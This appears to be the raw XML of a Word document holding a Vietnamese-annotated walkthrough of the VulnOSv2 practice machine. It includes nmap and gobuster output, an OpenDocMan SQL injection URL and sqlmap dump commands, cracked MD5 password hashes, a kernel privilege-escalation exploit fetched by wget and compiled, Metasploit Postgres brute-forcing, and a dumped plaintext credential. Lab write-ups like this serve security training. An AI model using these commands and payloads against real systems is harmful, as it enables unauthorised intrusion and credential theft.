        <w:t xml:space="preserve">      60  PCS Systemtechnik GmbH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map -A -T4 -sV -v -p- 192.168.1.13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PORT     STATE SERVICE VERSION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22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)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| ssh-hostkey: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1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b:3b (DSA)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2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)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256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)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  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)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80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))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| http-methods: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  Supported Methods: GET HEAD POST OPTIONS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|_http-title: VulnOSv2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|_http-server-header: Apache/2.4.7 (Ubuntu)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6667/tcp open  irc     ngircd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Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel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gobuster dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:hyperlink r:id="rId17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http://192.168.1.13/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt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===============================================================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Gobuster v3.1.0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by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@firefart)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===============================================================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[+] Url:                     </w:t>
      </w:r>
      <w:hyperlink r:id="rId18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http://192.168.1.13/</w:t>
        </w:r>
      </w:hyperlink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[+] Method:                  GET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[+] Threads:                 10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[+] Wordlist:               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt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[+] Negative Status codes:   404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[+] User Agent:              gobuster/3.1.0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[+] Timeout:                 10s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===============================================================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2022/08/03 22:40:28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Starting gobuster in directory enumeration mode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===============================================================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/javascript           (Status: 301) [Size: 316] [--&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId19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http://192.168.1.13/javascript/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]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/server-st</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">atus        (Status: 403) [Size: 292]                         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===============================================================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2022/08/03 22:41:40 Finished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===============================================================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gg khai thác opendocman, sau đó dùng searchsploit đ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 xml:space="preserve"> tìm cách khai thác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cat /usr/share/exploitdb/exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s/php/webapps/32075.txt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dán payload vào browser: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0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://[host]/ajax_udf.php?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,v</w:t>
        </w:r>
      </w:hyperlink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ersion%28%29,3,4,5,6,7,8,9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thành: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1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http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9</w:t>
        </w:r>
      </w:hyperlink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Dùng sqlmap đ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 xml:space="preserve"> khai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thác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sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId22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http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>" -p add_value --dbs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-p: parameter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add_value: paramater m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ẫ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>u đ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 xml:space="preserve"> test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[22:56:02] [INFO] fetching database names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available databases [6]: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[*] drupal7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[*] information_schema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[*] jabcd0cs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[*] mysql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[*] performance_schema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[*] phpmyadmin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dump db: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sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId23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http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>" -p add_value -D jabcd0cs --dump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có th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 xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ụ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ng các option: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sqlmap -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId24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http://192.168.1.13/jabcd0cs/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>ajax_udf.php?q=1&amp;add_value=odm_user</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>" -p add_value –threads=4 –columns -T odm_user -D jabcd0cs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sqlmap -u “</w:t>
      </w:r>
      <w:hyperlink r:id="rId25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http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>” -p a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dd_value –threads=4 –dump -T odm_user -D jabcd0cs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sqlmap -u “</w:t>
      </w:r>
      <w:hyperlink r:id="rId26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http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>” –threads=4 -D jabcd0cs -T odm_user -C id,usernam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e,password –dump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Database: jabcd0cs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Table: odm_user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[2 entries]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+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+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id | Email              | phone       | passwo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rd                         | username | last_name | department | first_name | pw_reset_code |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+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+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1  | webmin@exampl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e.com | 5555551212  | b78aae356709f8c31118ea613980954b | webmin   | min       | 2          | web        | &lt;blank&gt;       |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| 2  | guest@example.com  | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 | guest    | guest     | 2          | guest      | NULL    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">      |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+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+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dùng hash-identifider đ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 xml:space="preserve"> xác đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ị</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nh lo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ạ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i encrypt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decrypt password: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7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.md5online.org/md5-decrypt.html</w:t>
        </w:r>
      </w:hyperlink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webmin1980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(hash = b78aae356709f8c31118ea613980954b)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uname -a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Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i686 GNU/Linux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searchsploit ubuntu 3.13.0 | cut -b 1-150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wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId28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http://192.168.1.6/37292.c</w:t>
        </w:r>
      </w:hyperlink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--2022-08-04 08:27:16--  </w:t>
      </w:r>
      <w:hyperlink r:id="rId29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http://192.168.1.6/37292.c</w:t>
        </w:r>
      </w:hyperlink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Connecting to 192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.1.6:80... connected.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HTTP request sent, awaiting response... 200 OK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Length: 4968 (4.9K) [text/x-csrc]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Saving to: ‘37292.c’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100%[==========================================================================&gt;] 4,968       --.-K/s   in 0.001s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2022-08-04 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8:27:16 (4.85 MB/s) - ‘37292.c’ saved [4968/4968]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ls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37292.c  post.tar.gz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gcc 37292.c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ls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37292.c  a.out  post.tar.gz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a.out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-sh: 9: a.out: not found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./a.out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spawning threads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mount #1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mount #2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child threads done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/etc/ld.so.preload created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creating shared library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whoami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Chi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>m quy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ề</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n user khác khi chưa có root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root@VulnOSv2:/home/webmin# tar xzvf post.tar.gz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root@VulnOSv2:/home/webmin# netstat -tulpn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Active Internet connections (only servers)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Proto Recv-Q S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end-Q Local Address           Foreign Address         State       PID/Program name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tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1029/mysqld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tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    1151/ngircd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tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      968/sshd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tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      1051/postgres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tcp6       0      0 :::6667              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   :::*                    LISTEN      1151/ngircd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tcp6       0      0 :::80                   :::*                    LISTEN      1239/apache2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tcp6       0      0 :::22                   :::*                    LISTEN      968/sshd    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tcp6  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">     0      0 ::1:5432                :::*                    LISTEN      1051/postgres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udp        0      0 0.0.0.0:68              0.0.0.0:*                           765/dhclient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udp        0      0 0.0.0.0:50169           0.0.0.0:*               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            765/dhclient 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udp6       0      0 :::1818                 :::*                                765/dhclient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Port forwarding postgres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ssh webmin@192.168.1.13 -L 5432:localhost:5432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bruteforce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msfconsole -q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msf6 &gt; use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auxiliary/scanner/postgres/postgres_login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msf6 auxiliary(scanner/postgres/postgres_login) &gt; set RHOSTS 127.0.0.1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RHOSTS =&gt; 127.0.0.1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msf6 auxiliary(scanner/postgres/postgres_login) &gt; run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[!] No active DB -- Credential data will not be saved!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[-] 127.0.0.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r password)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[-] 127.0.0.1:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:@template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)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[+] 127.0.0.1:5432 - Login Successful: postgres:postgres@template1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[-] 127.0.0.1:5432 - LOGIN FAILED: scott:@t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emplate1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)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[-] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>127.0.0.1:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: admin:@template1 (Incorr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d username or password)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[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)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[*] Scanned 1 of 1 hosts (100% complete)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[*] Auxiliary module execution completed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msf6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary(scanner/postgres/postgres_login) &gt;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dump db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PGPASSWORD="postgres" pg_dumpall -U postgres -h localhost -p 5432   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vulnosadmin     c4nuh4ckm3tw1c3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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> đăng nh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ậ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>p ssh vào tài kho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ả</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ớ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i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vulnosadmin@VulnOSv2:~$ ls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r00t.blend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vulnosadmin@VulnOSv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2:~$ pwd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/home/vulnosadmin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copy file v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ề</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> máy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scp vulnosadmin@192.168.1.13:/home/vulnosadmin/r00t.blend /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cài blender đ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 xml:space="preserve"> m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ở</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file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apt-get install blender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 có m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ậ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t kh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>u root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00F52E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ab12fg//drg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62"/>
    <w:rsid w:val="00F5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8CCD7-B14E-4801-88AB-285FC385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ve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vanhauser-thc/thc-hydra" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_use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92.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.4/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vanhauser-thc/thc-hydra" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_us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elp.ubuntu.com/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://[host]/ajax_udf.php?q=1&amp;add_value=odm_user%20UNION%20SELECT%201,v" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.6/37292.c" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" 